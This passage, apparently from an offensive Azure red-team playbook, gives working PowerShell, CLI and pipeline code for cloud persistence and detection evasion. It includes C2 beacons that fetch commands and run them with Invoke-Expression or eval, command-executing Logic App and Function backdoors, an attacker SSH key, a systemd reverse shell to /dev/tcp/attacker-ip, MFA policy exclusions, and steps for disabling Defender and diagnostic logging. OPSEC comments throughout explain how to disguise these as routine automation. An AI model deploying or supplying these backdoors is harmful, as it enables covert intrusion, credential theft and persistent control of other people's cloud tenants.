$passwordCred = @{
DisplayName = "Production Key"
EndDateTime = (Get-Date).AddYears(10) # Max allowed: 2 years in many orgs
}
$secret = Add-MgApplicationPassword -ApplicationId $app.Id -PasswordCredential $passwordCred
# Save credentials securely
[PSCustomObject]@{
ApplicationId = $app.AppId
TenantId = (Get-MgContext).TenantId
ClientSecret = $secret.SecretText
ExpiryDate = $secret.EndDateTime
} | Export-Csv "backdoor-app-creds.csv" -NoTypeInformation
# Grant permissions to the service principal
# Microsoft Graph API permissions
$graphResourceId = "00000003-0000-0000-c000-000000000000"
$permissions = @(
@{
Id = "7ab1d382-f21e-4acd-a863-ba3e13f7da61" # Directory.Read.All
Type = "Role"
}
)
Update-MgApplication -ApplicationId $app.Id -RequiredResourceAccess @{
ResourceAppId = $graphResourceId
ResourceAccess = $permissions
}
# Grant admin consent (requires appropriate privileges)
# Manual: Portal > Enterprise Apps > App > Permissions > Grant admin consent
# Assign Azure RBAC role
$subscription = (Get-AzContext).Subscription.Id
New-AzRoleAssignment -ApplicationId $app.AppId `
-RoleDefinitionName "Reader" `
-Scope "/subscriptions/$subscription"
# Test authentication
az login --service-principal `
-u $app.AppId `
-p $secret.SecretText `
--tenant (Get-MgContext).TenantId
# OPSEC: Certificate-based auth is more stealthy than secrets
# Applications blend in better than user accounts
# Use monitoring/automation-themed names
3. Certificate-Based Service Principal (Stealthier):#
# Generate self-signed certificate
$cert = New-SelfSignedCertificate -Subject "CN=AzureDevOpsAgent" `
-CertStoreLocation "Cert:\CurrentUser\My" `
-KeyExportPolicy Exportable `
-KeySpec Signature `
-KeyLength 2048 `
-KeyAlgorithm RSA `
-HashAlgorithm SHA256 `
-NotAfter (Get-Date).AddYears(5)
# Export certificate
$certPath = "C:\temp\azure-devops-agent.pfx"
$certPassword = ConvertTo-SecureString -String "CertP@ssw0rd!" -Force -AsPlainText
Export-PfxCertificate -Cert $cert -FilePath $certPath -Password $certPassword
# Create application with certificate credential
$app = New-MgApplication -DisplayName "DevOps Build Agent"
# Convert cert to base64
$certData = [Convert]::ToBase64String($cert.RawData)
# Add certificate to application
Add-MgApplicationKey -ApplicationId $app.Id -KeyCredential @{
Type = "AsymmetricX509Cert"
Usage = "Verify"
Key = [System.Text.Encoding]::UTF8.GetBytes($certData)
}
# Create service principal
New-MgServicePrincipal -AppId $app.AppId
# Authenticate with certificate
Connect-AzAccount -ServicePrincipal `
-ApplicationId $app.AppId `
-Tenant (Get-MgContext).TenantId `
-CertificateThumbprint $cert.Thumbprint
# OPSEC: Certificates are less monitored than secrets
# No secret rotation requirements
# Common in enterprise automation
4. Automation Account Runbook Backdoor:#
# Create automation account (if needed)
New-AzAutomationAccount -ResourceGroupName "rg-automation" `
-Name "automation-maintenance" `
-Location "eastus" `
-Plan Free
# Create runbook with reverse shell capability
$runbookScript = @'
param()
# Connect using system-assigned managed identity
try {
Connect-AzAccount -Identity -ErrorAction Stop
} catch {
Write-Error "Failed to connect with managed identity"
exit
}
# Beacon to C2 (customize as needed)
$c2Url = "https://your-c2-domain.com/beacon"
$identity = Get-AzContext
$body = @{
hostname = $env:COMPUTERNAME
identity = $identity.Account.Id
subscription = $identity.Subscription.Id
timestamp = (Get-Date).ToString()
} | ConvertTo-Json
try {
Invoke-RestMethod -Uri $c2Url -Method Post -Body $body -ContentType "application/json"
} catch {
# Silently fail to avoid alerting
}
# Optional: Execute commands from C2
$cmdUrl = "https://your-c2-domain.com/command"
try {
$command = Invoke-RestMethod -Uri $cmdUrl -Method Get
if ($command) {
$result = Invoke-Expression $command -ErrorAction SilentlyContinue
Invoke-RestMethod -Uri "$c2Url/result" -Method Post -Body $result
}
} catch {
# Silently fail
}
'@
# Create runbook
New-AzAutomationRunbook -ResourceGroupName "rg-automation" `
-AutomationAccountName "automation-maintenance" `
-Name "System-HealthCheck" `
-Type PowerShell `
-Description "Performs routine system health checks"
# Import runbook content
Import-AzAutomationRunbook -ResourceGroupName "rg-automation" `
-AutomationAccountName "automation-maintenance" `
-Name "System-HealthCheck" `
-Path "runbook.ps1" `
-Type PowerShell `
-Force
# Publish runbook
Publish-AzAutomationRunbook -ResourceGroupName "rg-automation" `
-AutomationAccountName "automation-maintenance" `
-Name "System-HealthCheck"
# Create schedule (run every 6 hours)
New-AzAutomationSchedule -ResourceGroupName "rg-automation" `
-AutomationAccountName "automation-maintenance" `
-Name "HealthCheckSchedule" `
-StartTime (Get-Date).AddHours(1) `
-HourInterval 6
# Link runbook to schedule
Register-AzAutomationScheduledRunbook -ResourceGroupName "rg-automation" `
-AutomationAccountName "automation-maintenance" `
-RunbookName "System-HealthCheck" `
-ScheduleName "HealthCheckSchedule"
# Enable system-assigned managed identity on automation account
Set-AzAutomationAccount -ResourceGroupName "rg-automation" `
-Name "automation-maintenance" `
-AssignSystemIdentity
# Grant permissions to managed identity
$automationAccount = Get-AzAutomationAccount -ResourceGroupName "rg-automation" -Name "automation-maintenance"
New-AzRoleAssignment -ObjectId $automationAccount.Identity.PrincipalId `
-RoleDefinitionName "Reader" `
-Scope "/subscriptions/$((Get-AzContext).Subscription.Id)"
# OPSEC: Automation accounts are common in enterprises
# Scheduled runbooks blend with legitimate automation
# System-assigned identities are less suspicious than credentials
5. Logic App Webhook Backdoor:#
# Create Logic App with HTTP trigger
$logicAppDefinition = @{
'$schema' = 'https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#'
contentVersion = '1.0.0.0'
triggers = @{
manual = @{
type = 'Request'
kind = 'Http'
inputs = @{
schema = @{
type = 'object'
properties = @{
command = @{ type = 'string' }
token = @{ type = 'string' }
}
}
}
}
}
actions = @{
'Execute-Command' = @{
type = 'Http'
inputs = @{
method = 'POST'
uri = 'https://your-c2-domain.com/execute'
body = '@triggerBody()'
}
}
}
} | ConvertTo-Json -Depth 10
# Deploy Logic App
New-AzLogicApp -ResourceGroupName "rg-automation" `
-Name "SystemIntegration" `
-Location "eastus" `
-Definition $logicAppDefinition
# Get callback URL
$callbackUrl = Get-AzLogicAppTriggerCallbackUrl -ResourceGroupName "rg-automation" `
-Name "SystemIntegration" `
-TriggerName "manual"
Write-Host "Logic App URL: $($callbackUrl.Value)"
# Test invocation
Invoke-RestMethod -Uri $callbackUrl.Value `
-Method Post `
-Body (@{command="whoami"; token="secret"} | ConvertTo-Json) `
-ContentType "application/json"
# OPSEC: Logic Apps are common integration tools
# HTTP triggers don't require authentication (by default)
# Can proxy commands through Azure infrastructure
6. Azure Function Backdoor (Serverless):#
# Create Function App
New-AzFunctionApp -ResourceGroupName "rg-serverless" `
-Name "func-integration-prod" `
-Location "eastus" `
-StorageAccountName "storagefuncprod" `
-Runtime PowerShell `
-RuntimeVersion "7.2" `
-OSType Windows `
-IdentityType SystemAssigned
# Create function code
$functionCode = @'
using namespace System.Net
param($Request, $TriggerMetadata)
# Simple authentication
$authToken = $Request.Headers['X-Auth-Token']
if ($authToken -ne $env:AUTH_TOKEN) {
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{
StatusCode = 403
Body = "Unauthorized"
})
return
}
# Connect with managed identity
Connect-AzAccount -Identity
# Execute command from request
$command = $Request.Body.command
try {
$result = Invoke-Expression $command -ErrorAction Stop
$output = $result | Out-String
} catch {
$output = $_.Exception.Message
}
# Return result
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{
StatusCode = 200
Body = $output
})
'@
# Deploy function (requires Azure Functions Core Tools or portal)
# Manual deployment steps:
# 1. Create HTTP trigger function in portal
# 2. Paste code above
# 3. Set environment variable AUTH_TOKEN in Application Settings
# Get function URL
$functionKeys = Invoke-AzResourceAction -ResourceGroupName "rg-serverless" `
-ResourceType "Microsoft.Web/sites/functions" `
-ResourceName "func-integration-prod/HttpTrigger1" `
-Action "listkeys" `
-ApiVersion "2021-02-01" `
-Force
$functionUrl = "https://func-integration-prod.azurewebsites.net/api/HttpTrigger1?code=$($functionKeys.default)"
# Test function
Invoke-RestMethod -Uri $functionUrl `
-Method Post `
-Headers @{"X-Auth-Token" = "your-secret-token"} `
-Body (@{command = "Get-AzSubscription"} | ConvertTo-Json) `
-ContentType "application/json"
# OPSEC: Azure Functions are extremely common
# Managed identity provides legitimate authentication method
# Can be triggered on-demand or scheduled
7. Key Vault Secret Persistence:#
# Store backdoor credentials in Key Vault
$vaultName = "kv-backup-prod"
# Ensure Key Vault exists
$vault = Get-AzKeyVault -VaultName $vaultName -ResourceGroupName "rg-security" -ErrorAction SilentlyContinue
if (-not $vault) {
New-AzKeyVault -VaultName $vaultName `
-ResourceGroupName "rg-security" `
-Location "eastus" `
-EnabledForDeployment `
-EnabledForTemplateDeployment
}
# Store service principal credentials
$spCreds = @{
ClientId = "app-id-here"
ClientSecret = "secret-here"
TenantId = "tenant-id-here"
} | ConvertTo-Json
$secretValue = ConvertTo-SecureString -String $spCreds -AsPlainText -Force
Set-AzKeyVaultSecret -VaultName $vaultName `
-Name "ServicePrincipal-BackupAgent" `
-SecretValue $secretValue `
-ContentType "application/json"
# Store access token (short-lived but useful)
$token = (Get-AzAccessToken).Token
$tokenValue = ConvertTo-SecureString -String $token -AsPlainText -Force
Set-AzKeyVaultSecret -VaultName $vaultName `
-Name "CurrentAccessToken" `
-SecretValue $tokenValue
# Store SSH keys for VM access
$sshPrivateKey = Get-Content "~/.ssh/id_rsa" -Raw
$sshValue = ConvertTo-SecureString -String $sshPrivateKey -AsPlainText -Force
Set-AzKeyVaultSecret -VaultName $vaultName `
-Name "VM-SSHKey-Admin" `
-SecretValue $sshValue
# Retrieve later
$storedCreds = Get-AzKeyVaultSecret -VaultName $vaultName `
-Name "ServicePrincipal-BackupAgent" `
-AsPlainText
# OPSEC: Key Vaults designed for secret storage
# Secrets named appropriately blend in
# Access is logged but expected for automation accounts
8. Storage Account Blob Persistence:#
# Store backdoor scripts/payloads in storage account
$storageAccountName = "storagedocsprod"
$containerName = "system-configs"
# Get storage context
$storageAccount = Get-AzStorageAccount -ResourceGroupName "rg-storage" `
-Name $storageAccountName
$ctx = $storageAccount.Context
# Create container if needed (private access)
New-AzStorageContainer -Name $containerName -Context $ctx -Permission Off -ErrorAction SilentlyContinue
# Upload backdoor script
$scriptContent = @'
# Backdoor script
Connect-AzAccount -Identity
# Commands here
'@
$scriptContent | Out-File -FilePath "maintenance.ps1"
Set-AzStorageBlobContent -File "maintenance.ps1" `
-Container $containerName `
-Blob "scripts/maintenance.ps1" `
-Context $ctx `
-Force
# Generate SAS token for access (long duration)
$sasToken = New-AzStorageContainerSASToken -Name $containerName `
-Context $ctx `
-Permission rl `
-ExpiryTime (Get-Date).AddYears(5)
$blobUrl = "https://$storageAccountName.blob.core.windows.net/$containerName/scripts/maintenance.ps1$sasToken"
Write-Host "Backdoor script URL: $blobUrl"
# Execute from any Azure resource
# Invoke-RestMethod -Uri $blobUrl | Invoke-Expression
# OPSEC: Storage accounts ubiquitous in Azure
# Private containers with SAS tokens are common pattern
# Script names should be benign (maintenance, config, backup)
9. Conditional Access Policy Exclusion:#
# Add backdoor account to Conditional Access exclusion
# (Requires Policy.ReadWrite.ConditionalAccess permission)
# Get existing CA policies
$policies = Get-MgIdentityConditionalAccessPolicy
# Find MFA enforcement policy
$mfaPolicy = $policies | Where-Object {
$_.GrantControls.BuiltInControls -contains "mfa"
}
# Add backdoor user to exclusion list
$backdoorUser = Get-MgUser -Filter "userPrincipalName eq 'mssupport@domain.onmicrosoft.com'"
$excludedUsers = $mfaPolicy.Conditions.Users.ExcludeUsers
$excludedUsers += $backdoorUser.Id
Update-MgIdentityConditionalAccessPolicy -ConditionalAccessPolicyId $mfaPolicy.Id `
-Conditions @{
Users = @{
ExcludeUsers = $excludedUsers
}
}
# OPSEC: HIGHLY detectable - CA policy changes are closely monitored
# Only use if you have appropriate role and need to bypass MFA
# Better: Create service principal exempt from CA policies
10. DevOps Pipeline Backdoor:#
# Create Azure DevOps pipeline with backdoor
# Requires Azure DevOps CLI: pip install azure-devops
# Authenticate to Azure DevOps
az devops login --organization https://dev.azure.com/org-name
# Create new pipeline
cat > azure-pipelines.yml << 'EOF'
trigger:
- main
schedules:
- cron: "0 */6 * * *" # Every 6 hours
displayName: Health Check
branches:
include:
- main
pool:
vmImage: 'ubuntu-latest'
steps:
- task: AzureCLI@2
inputs:
azureSubscription: 'Production-Subscription'
scriptType: 'bash'
scriptLocation: 'inlineScript'
inlineScript: |
# Beacon to C2
curl -X POST https://your-c2-domain.com/beacon \
-H "Content-Type: application/json" \
-d "{\"agent\":\"devops\",\"time\":\"$(date)\"}"
# Optional: Execute commands from C2
CMD=$(curl -s https://your-c2-domain.com/command)
if [ ! -z "$CMD" ]; then
eval $CMD
fi
EOF
# Create pipeline
az pipelines create --name "System-Maintenance" \
--description "Automated system maintenance tasks" \
--repository azure-infra-repo \
--branch main \
--yml-path azure-pipelines.yml \
--organization https://dev.azure.com/org-name \
--project ProjectName
# OPSEC: DevOps pipelines have broad permissions via service connections
# Scheduled pipelines are common for automation
# Service connections use service principals with often-elevated access
11. VM Custom Script Extension Persistence:#
# Deploy custom script extension to VM for persistence
$vmName = "vm-web-prod-01"
$rgName = "rg-production"
# Create persistence script
$scriptContent = @'
#!/bin/bash
# Add backdoor SSH key
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQ... attacker@kali" >> /home/azureuser/.ssh/authorized_keys
# Create systemd service for reverse shell
cat > /etc/systemd/system/azure-monitor.service << 'SERVICE'
[Unit]
Description=Azure Monitoring Agent
After=network.target
[Service]
Type=simple
ExecStart=/usr/bin/bash -c 'while true; do bash -i >& /dev/tcp/attacker-ip/4444 0>&1; sleep 300; done'
Restart=always
RestartSec=30
[Install]
WantedBy=multi-user.target
SERVICE
systemctl daemon-reload
systemctl enable azure-monitor.service
systemctl start azure-monitor.service
'@
# Encode script
$scriptContent | Out-File -FilePath "persist.sh" -Encoding ascii
$encodedScript = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($scriptContent))
# Deploy custom script extension
Set-AzVMExtension -ResourceGroupName $rgName `
-VMName $vmName `
-Name "CustomScriptExtension" `
-Publisher "Microsoft.Azure.Extensions" `
-ExtensionType "CustomScript" `
-TypeHandlerVersion "2.1" `
-Settings @{
"script" = $encodedScript
}
# OPSEC: Custom script extensions are common for VM configuration
# One-time execution but can install persistent mechanisms
# Extension deployment is logged but script content may not be fully captured
Azure Detection Evasion Techniques#
1. Audit Log Manipulation:#
# CRITICAL: Azure audit logs are immutable and stored in Microsoft infrastructure
# Cannot be deleted or modified directly (unlike AWS CloudTrail in S3)
# Focus on evasion rather than log deletion
# Check diagnostic settings (where logs are sent)
Get-AzDiagnosticSetting -ResourceId "/subscriptions/$((Get-AzContext).Subscription.Id)"
# Identify Log Analytics workspaces receiving logs
Get-AzOperationalInsightsWorkspace
# Check retention policies
$workspace = Get-AzOperationalInsightsWorkspace -ResourceGroupName "rg-monitoring" -Name "workspace-prod"
Get-AzOperationalInsightsWorkspace -ResourceGroupName $workspace.ResourceGroupName -Name $workspace.Name |
Select-Object RetentionInDays
# EVASION: Disable diagnostic settings (highly detectable)
# DO NOT do this unless absolutely necessary - generates alerts
Remove-AzDiagnosticSetting -ResourceId "/subscriptions/$subscriptionId" -Name "setting-name"
# BETTER APPROACH: Work within blind spots
# - Use service principals (less user-context logging)
# - Operate during business hours
# - Use legitimate-seeming API patterns
# OPSEC: Cannot delete Azure Activity Logs (90 days retention minimum)
# Cannot delete Entra ID audit logs (30 days minimum)
# Focus on blending in rather than erasing tracks
2. Sign-in Log Evasion:#
# Entra ID sign-in logs are immutable and comprehensive
# Evasion strategies:
# Strategy 1: Use service principals (no interactive sign-in logs)
$tenantId = "tenant-id"
$appId = "app-id"
$secret = "client-secret"
$secureSecret = ConvertTo-SecureString $secret -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential($appId, $secureSecret)
Connect-AzAccount -ServicePrincipal -Credential $credential -Tenant $tenantId
# Strategy 2: Use certificate authentication (less obvious than secrets)
Connect-AzAccount -ServicePrincipal `
-ApplicationId $appId `
-Tenant $tenantId `
-CertificateThumbprint $thumbprint
# Strategy 3: Use managed identities (no credentials exposed)
# From Azure VM/App Service:
Connect-AzAccount -Identity
# Strategy 4: Token reuse (avoid new authentication events)
$token = (Get-AzAccessToken).Token
# Reuse token across sessions without re-authenticating
# Check for risky sign-in detections
Get-MgRiskDetection -Top 50 | Where-Object {
$_.UserPrincipalName -eq "your-account@domain.com"
}
# OPSEC: All authentication leaves traces
# Service principals generate fewer red flags than user accounts
# Managed identities are most stealthy (system-generated)
3. Conditional Access Bypass Techniques:#
# Identify Conditional Access policies affecting you
Get-MgIdentityConditionalAccessPolicy -All | ForEach-Object {
$policy = $_
$includedUsers = $policy.Conditions.Users.IncludeUsers
$excludedUsers = $policy.Conditions.Users.ExcludeUsers
if ($includedUsers -contains "All" -or $includedUsers -contains $currentUserId) {
if ($excludedUsers -notcontains $currentUserId) {
[PSCustomObject]@{
PolicyName = $policy.DisplayName
State = $policy.State
GrantControls = ($policy.GrantControls.BuiltInControls -join ', ')
Applications = ($policy.Conditions.Applications.IncludeApplications -join ', ')
}
}
}
}
# BYPASS METHODS:
# Method 1: Use excluded applications
# Some CA policies exclude specific apps (Office 365, Azure Portal)
# Authenticate via excluded app, then use tokens for other resources
# Method 2: Device-based bypass
# If policy requires compliant device, use compliant VM
# Authenticate from Azure VM marked as compliant
# Method 3: Named location bypass
# Identify trusted IP ranges
Get-MgIdentityConditionalAccessNamedLocation -All | Where-Object {
$_.AdditionalProperties.'@odata.type' -eq '#microsoft.graph.ipNamedLocation'
} | Select-Object DisplayName, @{N='IpRanges';E={$_.AdditionalProperties.ipRanges.cidrAddress}}
# VPN/proxy through trusted IP ranges if possible
# Method 4: Service principal exemption
# Service principals often exempt from user-targeted CA policies
# Use service principal instead of user account
# Method 5: Legacy authentication (if not blocked)
# Some organizations don't block legacy auth protocols
# Use older PowerShell modules or SMTP/IMAP if available
# NOTE: This is increasingly rare in 2024-2025
# OPSEC: CA policy evaluations are logged
# Failed policy evaluations generate alerts
# Better to comply with policies than bypass
4. Microsoft Defender for Cloud Evasion:#
# Check if Defender for Cloud is enabled
Get-AzSecurityPricing
# Get current security alerts
Get-AzSecurityAlert
# Check security contacts (who gets alerts)
Get-AzSecurityContact
# EVASION STRATEGIES:
# Strategy 1: Disable Defender for specific resource types (highly detectable)
Set-AzSecurityPricing -Name "VirtualMachines" -PricingTier "Free"
# NOTE: Requires Security Admin role; generates immediate alert
# Strategy 2: Suppress specific alerts (less obvious)
# Not directly possible via API - must use Portal
# Security Center > Security Alerts > Suppress
# Strategy 3: Work below detection thresholds
# - Small data exfiltration (under anomaly thresholds)
# - Slow enumeration (avoid rate-based detection)
# - Use legitimate tools (PowerShell, Az CLI vs custom exploits)
# Strategy 4: Blend with normal activity
# - Operate during business hours
# - Use service accounts that normally perform similar actions
# - Match patterns of legitimate automation
# Check what's being monitored
Get-AzSecurityAutoProvisioningSetting
# OPSEC: Defender for Cloud uses behavioral analytics
# Cannot be easily bypassed without administrative access
# Focus on appearing as legitimate activity
5. Sentinel / Log Analytics Evasion:#
# Check if Azure Sentinel is deployed
az sentinel workspace list
# Get Log Analytics workspaces
az monitor log-analytics workspace list --output table
# Query workspace to understand detection rules
# (Requires Log Analytics Reader or higher)
az monitor log-analytics workspace show \
--resource-group "rg-security" \
--workspace-name "sentinel-workspace"
# View analytic rules (if Sentinel is deployed)
az sentinel alert-rule list \
--resource-group "rg-security" \
--workspace-name "sentinel-workspace"
# EVASION STRATEGIES:
# Strategy 1: Understand detection queries
# Common Sentinel queries look for:
# - Unusual sign-in locations
# - After-hours activity
# - Bulk data access
# - Privilege escalation
# - New user/app creation
# - Role assignment changes
# Strategy 2: Stay below detection thresholds
# Example: If detection triggers on >100 resources enumerated
# Enumerate 50 resources, wait, enumerate 50 more
# Strategy 3: Time-based evasion
# Operate during business hours when activity is normal
$currentHour = (Get-Date).Hour
if ($currentHour -lt 8 -or $currentHour -gt 18) {
Write-Host "Outside business hours - waiting"
exit
}
# Strategy 4: Geographic consistency
# Authenticate from same IP/region as normal user activity
# Avoid authentication from impossible travel scenarios
# Strategy 5: Use automation accounts
# Actions performed by automation accounts generate different log patterns
# Less likely to trigger user behavioral analytics
# OPSEC: Sentinel detection rules are customizable per organization
# No universal evasion technique
# Reconnaissance to understand specific environment is key
6. Rate Limiting and Throttling Evasion:#
# Azure enforces API rate limits to prevent abuse
# Different limits for different resource types
# EVASION STRATEGIES:
# Strategy 1: Distribute across multiple identities
$identities = @("user1@domain.com", "user2@domain.com", "sp1", "sp2")
foreach ($identity in $identities) {
# Authenticate with different identity
# Perform subset of enumeration
# Switch to next identity
}
# Strategy 2: Add delays between requests
Get-AzResource | ForEach-Object {
$resource = $_
Start-Sleep -Seconds (Get-Random -Minimum 2 -Maximum 5)
# Process resource
}
# Strategy 3: Use pagination effectively
Get-AzRoleAssignment -First 50 # Don't request all at once
# Strategy 4: Cache results locally
$cachedUsers = Get-MgUser -All
# Use cached data instead of repeated queries
# Strategy 5: Distribute across regions
# Some services have per-region rate limits
$regions = @("eastus", "westus", "northeurope")
foreach ($region in $regions) {
Get-AzVM -Location $region
Start-Sleep -Seconds 3
}
# Monitor for rate limiting responses
try {
Get-AzResource
} catch {
if ($_.Exception.Response.StatusCode -eq 429) {
$retryAfter = $_.Exception.Response.Headers['Retry-After']
Write-Host "Rate limited. Retry after $retryAfter seconds"
Start-Sleep -Seconds $retryAfter
}
}
# OPSEC: Rate limiting errors (429) are logged
# Hitting rate limits frequently indicates suspicious activity
# Slow and steady approach is stealthier
7. Application Insights / Telemetry Evasion:#
# Many Azure services send telemetry to Application Insights
# Check for Application Insights instances
Get-AzApplicationInsights
# Get instrumentation keys (if accessible)
$appInsights = Get-AzApplicationInsights -ResourceGroupName "rg-monitoring" -Name "appinsights-prod"
$appInsights.InstrumentationKey
# EVASION STRATEGIES:
# Strategy 1: Disable telemetry in your payloads
# For Azure Functions, remove Application Insights connection string
Remove-AzFunctionAppSetting -ResourceGroupName "rg-serverless" `
-Name "func-backdoor" `
-AppSettingName "APPINSIGHTS_INSTRUMENTATIONKEY"
# Strategy 2: Filter telemetry
# Modify sampling settings to exclude your traffic
# (Requires access to Application Insights configuration)
# Strategy 3: Use resources without telemetry
# Focus on services that don't automatically send telemetry
# Storage accounts, Key Vaults (less telemetry than compute)
# OPSEC: Application Insights captures custom metrics
# May reveal application-level security issues
# Useful for attackers to understand monitoring coverage
8. Network Traffic Obfuscation:#
# Azure doesn't have VPC Flow Logs by default (unlike AWS)
# Network Watcher flow logs must be explicitly enabled
# Check for Network Watcher instances
az network watcher list --output table
# Check for NSG flow logs
az network watcher flow-log list --location "eastus"
# EVASION STRATEGIES:
# Strategy 1: Use Azure services as proxies
# Route traffic through Azure App Gateway, Front Door, or API Management
# Traffic appears as Azure-to-Azure communication
# Strategy 2: Use Private Endpoints
# Traffic stays within Azure backbone, less visibility
az network private-endpoint list --output table
# Strategy 3: Leverage Azure Relay
# Creates outbound-only connections (harder to detect inbound C2)
# Strategy 4: Use WebSockets in Azure Functions/App Services
# WebSocket traffic may bypass some network monitoring
# OPSEC: Azure internal traffic is less monitored than internet egress
# Private endpoints are common in enterprises
# SSL/TLS encryption prevents deep packet inspection
9. Token Lifetime and Refresh Strategy:#
# Azure tokens have limited lifetime (typically 1 hour)
# Frequent re-authentication generates logs
# EVASION STRATEGIES:
# Strategy 1: Use refresh tokens (longer lived)
# Refresh tokens valid for 90 days by default
# Can be used to obtain new access tokens without re-authentication
# Strategy 2: Request tokens with maximum duration
# For service principals, tokens last 1 hour (fixed)
# For user sessions, can request extended sessions
# Strategy 3: Use Conditional Access token lifetime policies
# If CA policies grant longer sessions, leverage them
# Strategy 4: Cache and reuse tokens across sessions
$token = (Get-AzAccessToken -ResourceUrl "https://management.azure.com/").Token
# Save token to file
$token | Out-File -FilePath "cached-token.txt"
# Later, reuse token
$cachedToken = Get-Content "cached-token.txt"
# Use token directly with REST API calls
$headers = @{
'Authorization' = "Bearer $cachedToken"
'Content-Type' = 'application/json'
}
# Check token expiration
$tokenParts = $cachedToken.Split('.')
$payload = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($tokenParts[1]))
$claims = $payload | ConvertFrom-Json
$expirationTime = [DateTimeOffset]::FromUnixTimeSeconds($claims.exp).LocalDateTime
Write-Host "Token expires: $expirationTime"
# OPSEC: Token reuse avoids repeated authentication events
# Refresh token usage is logged but less obvious than full login
# Monitor token expiration to avoid failed requests
10. Attribute-Based Evasion:#
# Azure uses attributes for risk scoring and detection
# Manipulate or spoof attributes to evade detection
# EVASION STRATEGIES:
# Strategy 1: Consistent user agent strings
# Use common user agents (Azure Portal, PowerShell, Azure CLI)
$headers = @{
'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Azure Portal'
}
# Strategy 2: Consistent source IPs
# Use same VPN/proxy for all operations
# Avoid impossible travel scenarios
# Strategy 3: Device compliance
# If possible, operate from Intune-managed devices
# Compliant devices trigger fewer alerts
# Strategy 4: Application consistency
# Use same application IDs for all operations
# Avoid switching between PowerShell, CLI, Portal, etc.
# Strategy 5: Metadata manipulation
# Some resources allow custom metadata
# Use legitimate-looking metadata
Set-AzResource -ResourceId $resourceId -Tag @{
Owner = "IT-Operations"
Department = "Infrastructure"
CostCenter = "CC-1234"
ManagedBy = "Terraform"
}
# OPSEC: Consistent patterns are less suspicious
# Metadata makes resources appear legitimate
# Device compliance bypasses many security checks
11. PIM (Privileged Identity Management) Awareness:#
# PIM provides just-in-time privileged access
# Activations are logged and time-limited
# Check if PIM is enabled
# (Requires PrivilegedAccess.Read.AzureAD)
Get-MgRoleManagementDirectoryRoleEligibilitySchedule -All
# List your eligible roles
$currentUser = (Get-MgContext).Account
Get-MgRoleManagementDirectoryRoleEligibilitySchedule -Filter "principalId eq '$currentUser'" -All
# EVASION STRATEGIES:
# Strategy 1: Activate roles during business hours
# Activation requests during off-hours may trigger alerts
# Strategy 2: Use maximum allowed duration
# Minimize number of activations (each is logged)
# Strategy 3: Provide legitimate-sounding justification
# PIM requires justification for activation
# Use business-appropriate reasons: "Incident response", "Backup restore", "Configuration update"
# Strategy 4: Avoid activating suspicious roles
# Global Administrator activation is heavily monitored
# Use lower-privilege roles if possible (Security Reader, etc.)
# Activate PIM role (example)
# This is typically done via Portal or Microsoft.Graph API
# New-MgRoleManagementDirectoryRoleAssignmentScheduleRequest cmdlet
# OPSEC: PIM activations generate immediate alerts to administrators
# All PIM activity is logged with justification
# Use sparingly and only when necessary
12. Multi-Tenant Awareness:#
# Azure supports multi-tenant applications
# Guest users in multiple tenants can pivot
# Enumerate tenants you have access to
Get-AzTenant
# Switch between tenants
Connect-AzAccount -Tenant "target-tenant-id"
# EVASION STRATEGIES:
# Strategy 1: Use different identities per tenant
# Avoid linking activities across tenants
# Strategy 2: Leverage guest access
# Guest users have different logging characteristics
# May be overlooked in security monitoring
# Strategy 3: Cross-tenant applications
# Applications can be authorized in multiple tenants
# Service principal in one tenant accessing another
# Check cross-tenant access
Get-MgServicePrincipal -Filter "appOwnerOrganizationId ne '$currentTenantId'"
# OPSEC: Multi-tenant operations may escape single-tenant SIEM
# Guest users often have less stringent monitoring
# Cross-tenant resource access is common in enterprises